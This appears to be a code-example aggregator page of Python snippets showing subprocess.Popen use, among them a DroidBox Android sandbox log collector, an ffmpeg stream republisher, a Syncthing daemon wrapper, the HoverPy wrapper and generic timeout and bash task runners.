        print " \ \ \ \ \/\`'__\ __`\/\ \  /'_` \ \  _ <' / __`\/\ \/'\\"
        print "  \ \ \_\ \ \ \/\ \L\ \ \ \/\ \L\ \ \ \L\ \\ \L\ \/>  </"
        print "   \ \____/\ \_\ \____/\ \_\ \___,_\ \____/ \____//\_/\_\\"
        print "    \/___/  \/_/\/___/  \/_/\/__,_ /\/___/ \/___/ \//\/_/"

        count = CountingThread()
        count.start()

        timeStamp = time.time()
        if duration:
            self.timer = threading.Timer(duration, self.stop)
            self.timer.start()

        if self.adb is None:
            self.adb = Popen([
                "adb", "logcat", "DroidBox:W", "dalvikvm:W",
                "ActivityManager:I"
            ],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE)

        # Collect DroidBox logs
        self.is_counting_logs = True
        self.lastScreenshot = 0
        while self.enabled:
            try:
                if self.output_dir and (time.time() -
                                        self.lastScreenshot) >= 5:
                    #Take Screenshots every 5 seconds.
                    os.system("adb shell screencap -p | sed 's/\r$//' > %s" % os.path.join(self.output_dir, "screen") \
                              + "_$(date +%Y-%m-%d_%H%M%S).png")
                    self.lastScreenshot = time.time()

                logcatInput = self.adb.stdout.readline()
                if not logcatInput:
                    raise LostADBException(
                        "We have lost the connection with ADB.")

                boxlog = logcatInput.split('DroidBox:')
                if len(boxlog) > 1:
                    try:
                        load = json.loads(decode(boxlog[1]))

                        self.filter_noises(load)

                        # DexClassLoader
                        if load.has_key('DexClassLoader'):
                            load['DexClassLoader']['type'] = 'dexload'
                            self.dexclass[time.time() -
                                          timeStamp] = load['DexClassLoader']
                            count.increaseCount()

                        # service started
                        if load.has_key('ServiceStart'):
                            load['ServiceStart']['type'] = 'service'
                            self.servicestart[time.time() -
                                              timeStamp] = load['ServiceStart']
                            count.increaseCount()

                        # received data from net
                        if load.has_key('RecvNet'):
                            host = load['RecvNet']['srchost']
                            port = load['RecvNet']['srcport']

                            self.recvnet[time.time() -
                                         timeStamp] = recvdata = {
                                             'type': 'net read',
                                             'host': host,
                                             'port': port,
                                             'data': load['RecvNet']['data']
                                         }
                            count.increaseCount()

                        # fdaccess
                        if load.has_key('FdAccess'):
                            self.accessedfiles[load['FdAccess']
                                               ['id']] = hexToStr(
                                                   load['FdAccess']['path'])

                        # file read or write
                        if load.has_key('FileRW'):
                            load['FileRW']['path'] = self.accessedfiles[
                                load['FileRW']['id']]
                            if load['FileRW']['operation'] == 'write':
                                load['FileRW']['type'] = 'file write'
                            else:
                                load['FileRW']['type'] = 'file read'

                            self.fdaccess[time.time() -
                                          timeStamp] = load['FileRW']
                            count.increaseCount()

                        # opened network connection log
                        if load.has_key('OpenNet'):
                            self.opennet[time.time() -
                                         timeStamp] = load['OpenNet']
                            count.increaseCount()

                        # closed socket
                        if load.has_key('CloseNet'):
                            self.closenet[time.time() -
                                          timeStamp] = load['CloseNet']
                            count.increaseCount()

                        # outgoing network activity log
                        if load.has_key('SendNet'):
                            load['SendNet']['type'] = 'net write'
                            self.sendnet[time.time() -
                                         timeStamp] = load['SendNet']

                            count.increaseCount()

                        # data leak log
                        if load.has_key('DataLeak'):
                            my_time = time.time() - timeStamp
                            load['DataLeak']['type'] = 'leak'
                            load['DataLeak']['tag'] = getTags(
                                int(load['DataLeak']['tag'], 16))
                            self.dataleaks[my_time] = load['DataLeak']
                            count.increaseCount()

                            if load['DataLeak']['sink'] == 'Network':
                                load['DataLeak']['type'] = 'net write'
                                self.sendnet[my_time] = load['DataLeak']
                                count.increaseCount()

                            elif load['DataLeak']['sink'] == 'File':
                                load['DataLeak']['path'] = self.accessedfiles[
                                    load['DataLeak']['id']]
                                if load['DataLeak']['operation'] == 'write':
                                    load['DataLeak']['type'] = 'file write'
                                else:
                                    load['DataLeak']['type'] = 'file read'

                                self.fdaccess[my_time] = load['DataLeak']
                                count.increaseCount()

                            elif load['DataLeak']['sink'] == 'SMS':
                                load['DataLeak']['type'] = 'sms'
                                self.sendsms[my_time] = load['DataLeak']
                                count.increaseCount()

                        # sent sms log
                        if load.has_key('SendSMS'):
                            load['SendSMS']['type'] = 'sms'
                            self.sendsms[time.time() -
                                         timeStamp] = load['SendSMS']
                            count.increaseCount()

                        # phone call log
                        if load.has_key('PhoneCall'):
                            load['PhoneCall']['type'] = 'call'
                            self.phonecalls[time.time() -
                                            timeStamp] = load['PhoneCall']
                            count.increaseCount()

                        # crypto api usage log
                        if load.has_key('CryptoUsage'):
                            load['CryptoUsage']['type'] = 'crypto'
                            self.cryptousage[time.time() -
                                             timeStamp] = load['CryptoUsage']
                            count.increaseCount()
                    except ValueError:
                        pass
            except KeyboardInterrupt:
                break
            except LostADBException:
                break
            except Exception as e:
                print(e.message)
                continue

        self.is_counting_logs = False
        count.stopCounting()
        count.join()
        # Kill ADB, otherwise it will never terminate
        self.stop()
        self.adb = None

        print json.dumps(self.get_output())
        if self.output_dir is None:
            return
        with open(os.path.join(self.output_dir, "analysis.json"),
                  "w") as jsonfile:
            jsonfile.write(
                json.dumps(self.get_output(), sort_keys=True, indent=4))

    def get_output(self):
        # Done? Store the objects in a dictionary, transform it in a JSON object and return it
        output = dict()

        # Sort the items by their key
        output["dexclass"] = self.dexclass
        output["servicestart"] = self.servicestart

        output["recvnet"] = self.recvnet
        output["opennet"] = self.opennet
        output["sendnet"] = self.sendnet
        output["closenet"] = self.closenet

        output["accessedfiles"] = self.accessedfiles
        output["dataleaks"] = self.dataleaks

        output["fdaccess"] = self.fdaccess
        output["sendsms"] = self.sendsms
        output["phonecalls"] = self.phonecalls
        output["cryptousage"] = self.cryptousage

        output["recvsaction"] = self.application.getRecvsaction()
        output["enfperm"] = self.application.getEnfperm()

        output["hashes"] = self.apk_hashes
        output["apkName"] = self.apk_name
        return output

    def get_counts(self):
        output = dict()

        # Sort the items by their key
        output["dexclass"] = len(self.dexclass)
        output["servicestart"] = len(self.servicestart)

        output["recvnet"] = len(self.recvnet)
        output["opennet"] = len(self.opennet)
        output["sendnet"] = len(self.sendnet)
        output["closenet"] = len(self.closenet)

        output["dataleaks"] = len(self.dataleaks)

        output["fdaccess"] = len(self.fdaccess)
        output["sendsms"] = len(self.sendsms)
        output["phonecalls"] = len(self.phonecalls)
        output["cryptousage"] = len(self.cryptousage)

        output["sum"] = sum(output.values())

        return output

    def filter_noises(self, log):
        """
        filter use less noises from log
        :param log: log of Droidbox in dict format
        :return: boolean
        """
        if isinstance(log, dict):
            # DexClassLoader
            if 'DexClassLoader' in log.keys():
                if log['DexClassLoader']['path'] in DEXCLASSLOADER_EXCLUDED:
                    log.pop('DexClassLoader')

            # fdaccess
            if 'FdAccess' in log.keys():
                for excluded_prefix in FDACCESS_EXCLUDED_PREFIX:
                    if hexToStr(log['FdAccess']['path']).startswith(
                            excluded_prefix):
                        log.pop('FdAccess')
                        break

            # file read or write
            if 'FileRW' in log.keys():
                if log['FileRW']['id'] not in self.accessedfiles.keys():
                    log.pop('FileRW')

        return log
示例#51
0
class Dinoroar:

    action_sub = None
    mqtt_client = None

    def __init__(self):
        run(['/usr/bin/amixer', 'cset', "iface=Mixer,name='Micro'", "0%"])
        story_path = os.path.join(os.path.realpath(os.path.dirname(__file__)),
                                  'stories')
        self.stories = [
            os.path.join(story_path, story) for story in os.listdir(story_path)
        ]
        with open('/etc/snips.toml') as f:
            self.snips_config = toml.load(f)
        with open('/usr/share/snips/assistant/assistant.json') as f:
            self.snips_model = json.load(f)
        self.snips_site = self.snips_config['snips-audio-server'][
            'bind'].split('@')[0]
        self._initialize_mqtt()
        self._initialize_gpio()
        startup_sub.terminate()

    def _initialize_mqtt(self):
        host = self.snips_config['snips-common']['mqtt'].split(':')[0]
        self.mqtt_client = Client()
        self.mqtt_client.username_pw_set(
            self.snips_config['snips-common']['mqtt_username'],
            self.snips_config['snips-common']['mqtt_password'])
        self.mqtt_client.on_connect = self.mqtt_on_connect
        self.mqtt_client.on_message = self.mqtt_on_message
        i = 0
        while True:
            try:
                self.mqtt_client.connect(host)
            except OSError:
                print("Network not ready. Waiting {} second.".format(2**i))
                time.sleep(2**i)
                i += 1
            else:
                break

    def _initialize_gpio(self):
        GPIO.setmode(GPIO.BCM)
        GPIO.setup(3, GPIO.IN, pull_up_down=GPIO.PUD_UP)
        GPIO.add_event_detect(3, GPIO.FALLING)
        GPIO.add_event_callback(3, self.button_pressed)

    def mqtt_on_connect(self, client, userdata, flags, rc):
        client.subscribe("hermes/#")

    def mqtt_on_message(self, client, userdata, message):
        topic = message.topic
        payload = message.payload
        if topic == "hermes/asr/startListening":
            self.listening_started()
        elif topic == "hermes/asr/stopListening":
            self.listening_stopped()
        elif re.match("hermes/intent/.+", topic):
            self.process_intent(json.loads(payload.decode()))

    def listening_started(self):
        run(['/usr/bin/amixer', 'cset', "iface=Mixer,name='Micro'", "70%"])

    def listening_stopped(self):
        run(['/usr/bin/amixer', 'cset', "iface=Mixer,name='Micro'", "0%"])

    def process_intent(self, message):
        if message['intent']['intentName'] == 'jzylks:ReadStory':
            story = random.choice(self.stories)
            self.action_sub = Popen(['mpg123', story],
                                    stdout=PIPE,
                                    stderr=PIPE)

    def button_pressed(self, event):
        if self.action_sub:
            self.action_sub.terminate()
            self.action_sub = None
            return
        message = {
            'siteId': self.snips_site,
            'modelId': self.snips_model['id'],
            'modelVersion': self.snips_model['version']['nluModel'],
            'modelType': 'universal',
            'currentSensitivity': 0.5
        }
        self.mqtt_client.publish('hermes/hotword/default/detected',
                                 json.dumps(message))

    def listen(self):
        self.mqtt_client.loop_forever()
示例#52
0
    def run_ffmpeg(self, channel_id, pull_url, push_url):
        publish_cmd = 'ffmpeg -loglevel 24 -stats -i %s -c copy -bsf:a aac_adtstoasc -f flv "%s"' % (
            pull_url, push_url)
        logging.info("publish cmd is %s" % publish_cmd)

        ret = -1
        for i in range(self.max_retries):
            try:
                proc = Popen(publish_cmd,
                             shell=True,
                             executable="/bin/bash",
                             stdout=PIPE,
                             stderr=PIPE)

                flags = fcntl.fcntl(proc.stdout.fileno(), fcntl.F_GETFL)
                fcntl.fcntl(proc.stdout.fileno(), fcntl.F_SETFL,
                            flags | os.O_NONBLOCK)

                flags = fcntl.fcntl(proc.stderr.fileno(), fcntl.F_GETFL)
                fcntl.fcntl(proc.stderr.fileno(), fcntl.F_SETFL,
                            flags | os.O_NONBLOCK)

                last_report_time = time.time()
                while proc.poll() == None:
                    try:
                        logging.debug("channel[%s]: %s" %
                                      (channel_id, proc.stdout.readline()))
                        last_report_time = time.time()
                    except:
                        if time.time() - last_report_time > 10:
                            #ffmpeg may be hungup, terminate it.
                            proc.terminate()
                        time.sleep(1)

                    try:
                        logging.info("channel[%s]: %s" %
                                     (channel_id, proc.stderr.readline()))
                        last_read_time = time.time()
                    except:
                        #do nothing
                        continue

                #save the return code
                ret = proc.returncode

                #save the log
                while True:
                    try:
                        line = proc.stdout.readline()
                        if not line:
                            break
                        logging.debug("channel[%s]: %s" % (channel_id, line))
                    except:
                        break

                while True:
                    try:
                        line = proc.stderr.readline()
                        if not line:
                            break
                        logging.info("channel[%s]: %s" % (channel_id, line))
                    except:
                        break

                #get ffmpeg return code
                ret = proc.returncode
                if ret != 0:
                    logging.error("publish ret: %d, cmd %s, retry..%d" %
                                  (ret, publish_cmd, i))
                    continue
                else:
                    logging.info("publish success, cmd %s" % (publish_cmd))
                    break
            except Exception as e:
                logging.error("run ffmpeg failed. exception: %s" % e)
                ret = -1
        return ret
示例#53
0
class DaemonProcess(GObject.GObject):
    __gsignals__ = {
        # line(text)	- emitted when process outputs full line
        b"line": (GObject.SIGNAL_RUN_FIRST, None, (object, )),
        # exit(code)	- emitted when process exits
        b"exit": (GObject.SIGNAL_RUN_FIRST, None, (int, )),
        # failed(exception) - emitted if process fails to start
        b"failed": (GObject.SIGNAL_RUN_FIRST, None, (object, )),
    }
    SCROLLBACK_SIZE = 500  # Maximum number of output lines stored in memory
    PRIORITY_LOWEST = 19
    PRIORITY_LOW = 10
    PRIORITY_NORMAL = 0
    PRIORITY_HIGH = -10
    PRIORITY_HIGHEST = -20

    def __init__(self, cmdline, priority=PRIORITY_NORMAL, max_cpus=0, env={}):
        """ cmdline should be list of arguments """
        GObject.GObject.__init__(self)
        self.cmdline = cmdline
        self.priority = priority
        self.env = {x: env[x] for x in env}
        self.env["STNORESTART"] = "1"  # see syncthing --help
        self.env["STNOUPGRADE"] = "1"
        if max_cpus > 0:
            self.env["GOMAXPROCS"] = str(max_cpus)
        self._proc = None

    def start(self):
        for x in self.env:
            os.environ[x] = self.env[x]
        try:
            self._cancel = Gio.Cancellable()
            if IS_WINDOWS:
                # Windows
                sinfo = STARTUPINFO()
                sinfo.dwFlags = STARTF_USESHOWWINDOW
                sinfo.wShowWindow = 0
                cflags = nice_to_priority_class(self.priority)
                self._proc = Popen(self.cmdline,
                                   stdin=PIPE,
                                   stdout=PIPE,
                                   stderr=PIPE,
                                   startupinfo=sinfo,
                                   creationflags=cflags)
                self._stdout = WinPopenReader(self._proc.stdout)
                self._check = GLib.timeout_add_seconds(1, self._cb_check_alive)
            elif HAS_SUBPROCESS:
                # New Gio
                flags = Gio.SubprocessFlags.STDOUT_PIPE | Gio.SubprocessFlags.STDERR_MERGE
                if self.priority == 0:
                    self._proc = Gio.Subprocess.new(self.cmdline, flags)
                else:
                    # I just really do hope that there is no distro w/out nice command
                    self._proc = Gio.Subprocess.new(
                        ["nice", "-n", "%s" % self.priority] + self.cmdline,
                        flags)
                self._proc.wait_check_async(None, self._cb_finished)
                self._stdout = self._proc.get_stdout_pipe()
            else:
                # Gio < 3.12 - Gio.Subprocess is missing :(
                if self.priority == 0:
                    self._proc = Popen(self.cmdline, stdout=PIPE)
                else:
                    # still hoping
                    self._proc = Popen(
                        ["nice", "-n", "%s" % self.priority], stdout=PIPE)
                self._stdout = Gio.UnixInputStream.new(
                    self._proc.stdout.fileno(), False)
                self._check = GLib.timeout_add_seconds(1, self._cb_check_alive)
        except Exception as e:
            # Startup failed
            self.emit("failed", e)
            return
        self._lines = deque([], DaemonProcess.SCROLLBACK_SIZE)
        self._buffer = ""
        self._stdout.read_bytes_async(256, 0, self._cancel, self._cb_read, ())

    def _cb_read(self, pipe, results, *a):
        """ Handler for read_bytes_async """
        try:
            response = pipe.read_bytes_finish(results)
        except Exception as e:
            if not self._cancel.is_cancelled():
                log.exception(e)
                GLib.idle_add(pipe.read_bytes_async, 256, 1, None,
                              self._cb_read)
            return
        response = response.get_data().decode('utf-8')
        self._buffer = "%s%s" % (self._buffer, response)
        while "\n" in self._buffer:
            line, self._buffer = self._buffer.split("\n", 1)
            self._lines.append(line)
            self.emit('line', line)
        if not self._cancel.is_cancelled():
            GLib.idle_add(pipe.read_bytes_async, 256, 1, None, self._cb_read,
                          ())

    def _cb_check_alive(self, *a):
        """
		Repeatedly check if process is still alive.
		Called only on windows
		"""
        if self._proc == None:
            # Never started or killed really fast
            self.emit('exit', 1)
            self._cancel.cancel()
            if IS_WINDOWS: self._stdout.close()
            return False
        self._proc.poll()
        if self._proc.returncode is None:
            # Repeat until finished or canceled
            return (not self._cancel.is_cancelled())
        # Child just died :)
        self.emit('exit', self._proc.returncode)
        self._cancel.cancel()
        if IS_WINDOWS: self._stdout.close()
        return False

    def _cb_finished(self, proc, results):
        """
		Callback for wait_check_async.
		With Gio < 3.12, timer and _cb_check_alive is used.
		"""
        try:
            proc.wait_check_finish(results)
            log.info("Subprocess finished with code %s",
                     proc.get_exit_status())
        except GLib.GError:
            # Exited with exit code
            log.info("Subprocess exited with code %s", proc.get_exit_status())
        if proc.get_exit_status() == 127:
            # Command not found
            self.emit("failed", Exception("Command not found"))
        else:
            self.emit('exit', proc.get_exit_status())
        if IS_WINDOWS: self._stdout.close()
        self._cancel.cancel()

    def terminate(self):
        """ Terminates process (sends SIGTERM) """
        if not self._proc is None:
            if IS_WINDOWS:
                # Windows
                self._proc.terminate()
            elif HAS_SUBPROCESS:
                # Gio.Subprocess
                self._proc.send_signal(15)
            else:
                # subprocess.Popen
                self._proc.terminate()
            self._proc = None
            if IS_WINDOWS: self._stdout.close()
            self._cancel.cancel()

    def kill(self):
        """ Kills process (sends SIGTERM) """
        if not self._proc is None:
            if IS_WINDOWS:
                # Windows - can't actually kill
                self._proc.terminate()
            elif HAS_SUBPROCESS:
                # Gio.Subprocess
                self._proc.force_exit()
            else:
                # subprocess.Popen
                self._proc.kill()
            self._proc = None
            if IS_WINDOWS: self._stdout.close()
            self._cancel.cancel()

    def get_output(self):
        """ Returns process output as iterable list of lines """
        return self._lines

    def get_commandline(self):
        """ Returns commandline used to start process """
        return self.cmdline
示例#54
0
文件: hp.py 项目: eddiechantc/hoverpy
class HoverPy:
    def __init__(self,
                 host="localhost",
                 capture=False,
                 proxyPort=8500,
                 adminPort=8888,
                 modify=False,
                 middleware="",
                 dbpath="",
                 db="",
                 simulation="",
                 synthesize=False,
                 metrics=False,
                 dev=False,
                 auth=False,
                 delays=[],
                 cert="",
                 certName="",
                 certOrg="",
                 dest=[],
                 verbose=False,
                 generateCACert=False,
                 destination="",
                 key="",
                 tlsVerification=True,
                 httpsToHttp=False,
                 recordMode=None,
                 showCmd=False,
                 spy=False):
        self._proxyPort = proxyPort
        self._adminPort = adminPort
        self._host = host
        self._modify = modify
        self._middleware = middleware
        self._flags = []
        self._capture = capture
        self._dbpath = dbpath
        self._db = db
        self._simulation = simulation
        self._synthesize = synthesize
        self._verbose = verbose
        self._session = requests.Session()
        self._session.trust_env = False
        self._metrics = metrics
        self._dev = dev
        self._auth = auth
        self._delays = delays
        self._cert = cert
        self._certName = certName
        self._certOrg = certOrg
        self._dest = dest
        self._generateCACert = generateCACert
        self._destination = destination
        self._key = key
        self._tlsVerification = tlsVerification
        self._httpsToHttp = httpsToHttp
        self._recordMode = recordMode
        self._showCmd = showCmd
        self._spy = spy
        self.__enableProxy()

        if self._recordMode == "once":
            self._capture = not os.path.isfile(self._dbpath)

        self.__start()

        if self._delays:
            self.__addDelaysFromParam()

    def wipe(self):
        """
        Wipe the bolt database.

        Calling this after HoverPy has been instantiated is
        potentially dangerous. This function is mostly used
        internally for unit tests.
        """
        try:
            if os.isfile(self._dbpath):
                os.remove(self._dbpath)
        except OSError:
            pass

    def capture(self):
        """
        Switches hoverfly to capture mode.
        """
        return self.mode("capture")

    def simulate(self):
        """
        Switches hoverfly to simulate mode.

        Please note simulate is the default mode.
        """
        return self.mode("simulate")

    def spy(self):
        """
        Switches hoverfly to spy mode.
        """
        return self.mode("spy")

    def config(self):
        """
        Returns the hoverfly configuration json.
        """
        return self._session.get(self.__v2() + "/hoverfly").json()

    def simulation(self, data=None):
        """
        Gets / Sets the simulation data.

        If no data is passed in, then this method acts as a getter.
        if data is passed in, then this method acts as a setter.

        Keyword arguments:
        data -- the simulation data you wish to set (default None)
        """
        if data:
            return self._session.put(self.__v2() + "/simulation", data=data)
        else:
            return self._session.get(self.__v2() + "/simulation").json()

    def destination(self, name=""):
        """
        Gets / Sets the destination data.
        """
        if name:
            return self._session.put(self.__v2() + "/hoverfly/destination",
                                     data={
                                         "destination": name
                                     }).json()
        else:
            return self._session.get(self.__v2() +
                                     "/hoverfly/destination").json()

    def middleware(self):
        """
        Gets the middleware data.
        """
        return self._session.get(self.__v2() + "/hoverfly/middleware").json()

    def mode(self, mode=None):
        """
        Gets / Sets the mode.

        If no mode is provided, then this method acts as a getter.

        Keyword arguments:
        mode -- this should either be 'capture' or 'simulate' (default None)
        """
        if mode:
            logging.debug("SWITCHING TO %s" % mode)
            url = self.__v2() + "/hoverfly/mode"
            logging.debug(url)
            return self._session.put(url,
                                     data=json.dumps({"mode":
                                                      mode})).json()["mode"]
        else:
            return self._session.get(self.__v2() +
                                     "/hoverfly/mode").json()["mode"]

    def usage(self):
        """
        Gets the usage data.
        """
        return self._session.get(self.__v2() + "/hoverfly/usage").json()

    def metadata(self, delete=False):
        """
        Gets the metadata.
        """
        if delete:
            return self._session.delete(self.__v1() + "/metadata").json()
        else:
            return self._session.get(self.__v1() + "/metadata").json()

    def records(self, data=None):
        """
        Gets / Sets records.
        """
        if data:
            return self._session.post(self.__v1() + "/records",
                                      data=data).json()
        else:
            return self._session.get(self.__v1() + "/records").json()

    def delays(self, delays=[]):
        """
        Gets / Sets the delays. 
        """
        if delays:
            return self._session.put(self.__v1() + "/delays",
                                     data=json.dumps(delays)).json()
        else:
            return self._session.get(self.__v1() + "/delays").json()

    def addDelay(self, urlPattern="", delay=0, httpMethod=None):
        """
        Adds delays. 
        """
        print("addDelay is deprecated please use delays instead")
        delay = {"urlPattern": urlPattern, "delay": delay}
        if httpMethod:
            delay["httpMethod"] = httpMethod
        return self.delays(delays={"data": [delay]})

    def httpProxy(self):
        return "http://%s:%i" % (self._host, self._proxyPort)

    def httpsProxy(self):
        if self._httpsToHttp:
            return self.httpProxy()
        else:
            return "https://%s:%i" % (self._host, self._proxyPort)

    def __del__(self):
        if self._process:
            self.__stop()

    def __exit__(self, exc_type, exc_val, exc_tb):
        if self._process:
            self.__stop()

    def __enter__(self):
        return self

    def __host(self):
        """
        Returns the URL to the admin interface / APIs.
        """
        return "http://%s:%i" % (self._host, self._adminPort)

    def __v1(self):
        """
        Return the URL to the v1 API
        """
        return self.__host() + "/api"

    def __v2(self):
        """
        Return the URL to the v2 API
        """
        return self.__host() + "/api/v2"

    def __enableProxy(self):
        """
        Set the required environment variables to enable the use of hoverfly as a proxy.
        """
        os.environ["HTTP_PROXY"] = self.httpProxy()
        os.environ["HTTPS_PROXY"] = self.httpsProxy()

        os.environ["REQUESTS_CA_BUNDLE"] = os.path.join(
            os.path.dirname(os.path.abspath(__file__)), "cert.pem")

    def __disableProxy(self):
        """
        Clear the environment variables required to enable the use of hoverfly as a proxy.
        """
        del os.environ['HTTP_PROXY']
        del os.environ['HTTPS_PROXY']
        del os.environ['REQUESTS_CA_BUNDLE']

    def __writepid(self, pid):
        """
        HoverFly fails to launch if it's already running on
        the same ports. So we have to keep track of them using
        temp files with the proxy port and admin port, containing
        the processe's PID. 
        """
        import tempfile
        d = tempfile.gettempdir()
        name = os.path.join(
            d, "hoverpy.%i.%i" % (self._proxyPort, self._adminPort))
        with open(name, 'w') as f:
            f.write(str(pid))
            logging.debug("writing to %s" % name)

    def __rmpid(self):
        """
        Remove the PID file on shutdown, unfortunately
        this may not get called if not given the time to
        shut down.
        """
        import tempfile
        d = tempfile.gettempdir()
        name = os.path.join(
            d, "hoverpy.%i.%i" % (self._proxyPort, self._adminPort))
        if os.path.exists(name):
            os.unlink(name)
            logging.debug("deleting %s" % name)

    def __kill_if_not_shut_properly(self):
        """
        If the HoverFly process on these given ports
        did not shut down correctly, then kill the pid
        before launching a new instance.
        todo: this will kill existing HoverFly processes
        on those ports indiscriminately
        """
        import tempfile
        d = tempfile.gettempdir()
        name = os.path.join(
            d, "hoverpy.%i.%i" % (self._proxyPort, self._adminPort))
        if os.path.exists(name):
            logging.debug("pid file exists.. killing it")
            f = open(name, "r")
            pid = int(f.read())
            try:
                import signal
                os.kill(pid, signal.SIGTERM)
                logging.debug("killing %i" % pid)
            except:
                logging.debug("nothing to clean up")
                pass
            finally:
                os.unlink(name)

    def __start(self):
        """
        Start the hoverfly process.

        This function waits until it can make contact
        with the hoverfly API before returning.
        """
        logging.debug("starting %i" % id(self))
        self.__kill_if_not_shut_properly()
        self.FNULL = open(os.devnull, 'w')
        flags = self.__flags()
        cmd = [hoverfly] + flags
        if self._showCmd:
            print(cmd)
        self._process = Popen(
            [hoverfly] + flags,
            #stdin=self.FNULL,
            #stdout=self.FNULL,
            stderr=subprocess.STDOUT)
        start = time.time()
        while time.time() - start < 1:
            try:
                url = "http://%s:%i/api/health" % (self._host, self._adminPort)
                r = self._session.get(url)
                j = r.json()
                up = "message" in j and "healthy" in j["message"]
                if up:
                    logging.debug("has pid %i" % self._process.pid)
                    self.__writepid(self._process.pid)
                    return self._process
                else:
                    time.sleep(1 / 100.0)
            except:
                # import traceback
                # traceback.print_exc()
                # wait 10 ms before trying again
                time.sleep(1 / 100.0)
                pass

        logging.error("Could not start hoverfly!")
        raise ValueError("Could not start hoverfly!")

    def __stop(self):
        """
        Stop the hoverfly process.
        """
        if logging:
            logging.debug("stopping")
        self._process.terminate()
        # communicate means we wait until the process
        # was actually terminated, this removes some
        # warnings in python3
        self._process.communicate()
        self._process = None
        self.FNULL.close()
        self.FNULL = None
        self.__disableProxy()
        # del self._session
        # self._session = None
        self.__rmpid()

    def __flags(self):
        """
        Internal method. Turns arguments into flags.
        """
        flags = []
        if self._capture:
            flags.append("-capture")
        if self._spy:
            flags.append("-spy")
        if self._dbpath:
            flags += ["-db-path", self._dbpath]
            flags += ["-db", "boltdb"]
        else:
            flags += ["-db", "memory"]
        if self._synthesize:
            assert (self._middleware)
            flags += ["-synthesize"]
        if self._simulation:
            flags += ["-import", self._simulation]
        if self._proxyPort:
            flags += ["-pp", str(self._proxyPort)]
        if self._adminPort:
            flags += ["-ap", str(self._adminPort)]
        if self._modify:
            flags += ["-modify"]
        if self._verbose:
            flags += ["-v"]
        if self._dev:
            flags += ["-dev"]
        if self._metrics:
            flags += ["-metrics"]
        if self._auth:
            flags += ["-auth"]
        if self._middleware:
            flags += ["-middleware", self._middleware]
        if self._cert:
            flags += ["-cert", self._cert]
        if self._certName:
            flags += ["-cert-name", self._certName]
        if self._certOrg:
            flags += ["-cert-org", self._certOrg]
        if self._destination:
            flags += ["-destination", self._destination]
        if self._key:
            flags += ["-key", self._key]
        if self._dest:
            for i in range(len(self._dest)):
                flags += ["-dest", self._dest[i]]
        if self._generateCACert:
            flags += ["-generate-ca-cert"]
        if not self._tlsVerification:
            flags += ["-tls-verification", "false"]

        logging.debug("flags:" + str(flags))
        return flags

    def __addDelaysFromParam(self):
        delaysDoc = []
        for delays in self._delays:
            delay = {"urlPattern": delays[0], "delay": delays[1]}
            if len(delays) == 3:
                delay["httpMethod"] = delays[2]
            delaysDoc.append(delay)
        return self.delays(delays={"data": delaysDoc})
示例#55
0
class TimeoutProcess(object):
    '''Runs an external command until timeout is reached

    Assumes that Popen uses PIPE for stdin, stdout and stderr
    Data for stdin may be supplied on instantiation, stdout and
    stderr will be returned from the call.'''
    def __init__(self):
        self.argv = None
        self.timeout = None
        self.stdin = None
        self.stdout = ''
        self.stderr = ''
        self.p = None
        self.t = None
        self.returncode = -127

    def __call__(self, argv, timeout, stdin=None, **kwargs):
        '''Run external command argv until timeout is reached

        If stdin is not none the data will be supplied to the
        processes stdin.
        Remaining kwargs will be passed to Popen.
        stderr and stdout are always strings, returncode is -1
        if timeout occured'''

        self.argv = argv
        self.timeout = timeout
        self.stdin = stdin

        def target():
            self.p = Popen(self.argv,
                           stdin=PIPE,
                           stdout=PIPE,
                           stderr=PIPE,
                           **kwargs)
            (self.stdout, self.stderr) = self.p.communicate(self.stdin)
            self.returncode = self.p.returncode

        self.t = Thread(target=target)
        self.t.start()
        self.t.join(self.timeout)

        if self.t.isAlive():
            # In strange cases, there is no subprocess...
            if self.p:
                log.debug("Terminating process %r in thread %r", self.p.pid,
                          self.t.name)
                try:
                    self.p.terminate()
                except OSError as e:  # pragma: no cover
                    if e.args[0] != errno.ESRCH:
                        raise
                self.t.join(THREADKILLTIMEOUT)
                if self.t.isAlive():
                    log.debug("Killing process %r in thread %r", self.p.pid,
                              self.t.name)
                    try:
                        self.p.kill()
                    except OSError as e:  # pragma: no cover
                        if e.args[0] != errno.ESRCH:
                            raise
                    if self.t.isAlive():
                        log.warn("Process %r in thread %r still won't die...",
                                 self.p and self.p.pid or None,
                                 self.t and self.t.name or None)
                self.stderr += '\nTimeout occurred\n'
                self.returncode = -1
            else:  # pragma: no cover
                log.warn('No subprocess found :-/')
                self.stderr += '\nAn error occurred\n'
                self.returncode = -1

        return process(self.returncode, self.stdout, self.stderr)
示例#56
0
    def run(self, data, store, signal, context, **kwargs):
        """ The main run method of the Python task.

        Args:
            data (MultiTaskData): The data object that has been passed from the
                                  predecessor task.
            store (DataStoreDocument): The persistent data store object that allows the
                                       task to store data for access across the current
                                       workflow run.
            signal (TaskSignal): The signal object for tasks. It wraps the construction
                                 and sending of signals into easy to use methods.
            context (TaskContext): The context in which the tasks runs.

        Returns:
            Action: An Action object containing the data that should be passed on
                    to the next task and optionally a list of successor tasks that
                    should be executed.
        """
        params = self.params.eval(data, store, exclude=['command'])

        capture_stdout = self._callback_stdout is not None or params.capture_stdout
        capture_stderr = self._callback_stderr is not None or params.capture_stderr

        stdout_file = TemporaryFile() if params.capture_stdout else None
        stderr_file = TemporaryFile() if params.capture_stderr else None

        stdout = PIPE if capture_stdout else None
        stderr = PIPE if capture_stderr else None

        # change the user or group under which the process should run
        if params.user is not None or params.group is not None:
            pre_exec = self._run_as(params.user, params.group)
        else:
            pre_exec = None

        # call the command
        proc = Popen(self.params.eval_single('command', data, store),
                     cwd=params.cwd,
                     shell=True,
                     env=params.env,
                     preexec_fn=pre_exec,
                     stdout=stdout,
                     stderr=stderr,
                     stdin=PIPE if params.stdin is not None else None)

        # if input is available, send it to the process
        if params.stdin is not None:
            proc.stdin.write(params.stdin.encode(sys.getfilesystemencoding()))

        # send a notification that the process has been started
        try:
            if self._callback_process is not None:
                self._callback_process(proc.pid, data, store, signal, context)
        except (StopTask, AbortWorkflow):
            proc.terminate()
            raise

        # send the output handling to a thread
        if capture_stdout or capture_stderr:
            output_reader = BashTaskOutputReader(proc, stdout_file,
                                                 stderr_file,
                                                 self._callback_stdout,
                                                 self._callback_stderr,
                                                 params.refresh_time, data,
                                                 store, signal, context)
            output_reader.start()
        else:
            output_reader = None

        # wait for the process to complete and watch for a stop signal
        while proc.poll() is None or\
                (output_reader is not None and output_reader.is_alive()):
            sleep(params.refresh_time)
            if signal.is_stopped:
                proc.terminate()

        if output_reader is not None:
